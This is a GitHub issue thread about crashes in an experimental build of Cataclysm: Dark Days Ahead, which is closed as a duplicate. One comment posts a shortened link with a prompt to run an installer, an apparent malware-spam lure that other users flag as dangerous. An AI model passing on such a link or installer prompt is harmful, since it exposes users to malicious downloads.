### ISSUE TITLE
Crashed twice

### ISSUE THREAD

**Issue by bullkang** [CleverRaven/Cataclysm-DDA#76158]
### Describe the bug

Experimental Build 2024-09-02-2126 crashed shortly after playing, restart it (lost previous progress due to crush) and shortly after crashed again.

### Attach save file

[crash.log](https://github.com/user-attachments/files/16841967/crash.log)
[debug.log](https://github.com/user-attachments/files/16841969/debug.log)

### Steps to reproduce

First Crash player was in sewage plant simply walking. Second crash was just outside sewage plant, had just killed a fat zombie and was browsing inventory I believe. 

### Expected behavior

Don't remember ever having the game crash. Usually just get the pop-ups where I can choose "I for Ignore".

### Versions and configuration

- OS: Linux
    - OS Version: Distributor ID: Debian; Description: Debian GNU/Linux 12 (bookworm); Release: 12; Codename: bookworm; 
- Game Version: cdda-experimental-2024-09-02-2126 9c0bc47 [64-bit]
- Graphics Version: Tiles
- Game Language: System language []
- Mods loaded: [
    Dark Days Ahead [dda],
    Disable NPC Needs [no_npc_food],
    Portal Storms Ignore NPCs [personal_portal_storms],
    Slowdown Fungal Growth [no_fungal_growth]
]

### Additional context

[Ceiba.zip](https://github.com/user-attachments/files/16841994/Ceiba.zip)

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by bullkang** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

what is that maher-nakesh? that link just reports a warning: 

"Warning: This URL has been blocked by Bitly's systems as potentially harmful."

**Comment by BaumgeistOne** [comment]
Sadly, that link is just dangerous spam.

Concerning your crash, the crash log says something about "bad optional access", so it might be the same issue as #76110.

**Comment by RenechCDDA** [comment]
Duplicate of #76110
